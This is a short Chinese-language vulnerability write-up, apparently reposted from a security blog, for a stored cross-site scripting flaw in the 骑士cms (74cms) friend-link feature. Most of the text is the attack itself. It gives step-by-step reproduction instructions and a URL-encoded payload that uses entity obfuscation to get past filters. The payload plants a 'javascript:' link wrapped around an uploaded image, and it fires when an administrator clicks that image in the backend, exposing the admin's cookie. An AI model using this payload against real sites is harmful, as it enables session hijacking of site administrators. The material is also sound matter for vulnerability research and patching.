原文地址:骑士cms漏洞
00×0
测试环境:
Windows
+ PHPstudy
参考文章:
http://www.nmap.cc/jsjl/112.html
00×1
漏洞证明:
首先先注册一个企业号 完整公司基本信息 在上传一张营业执照图片
复制图片地址构造payload
如图片地址upload/data/certificate/2018/06/13/1528874681152.png
Payload:
http%3A%2F%2Fwww.test.com%22%3E%3C%0Ba%0B+class="admin_%26%23102%3Brameset"+href%3Dja%26%23118%3Basc%26%23114%3Bipt%3Aale%26%23114t%28document.cookie%29%0B%3E%3C%0Bimg%0B+src%3D%2Fupload%2Fdata%2Fcertificate%2F2018%2F06%2F13%2F1528874681152.png%0B%3E%3C%0B%2Fa%0B%3E%3C%0Bb+a%3D%22
点击首页下面的 申请友情链接 抓包 把构造好的payload
填写到link_url
参数下
提交成功后
登录后台-广告-友情链接
就会出现我们上传的图片,点击图片会弹出cookie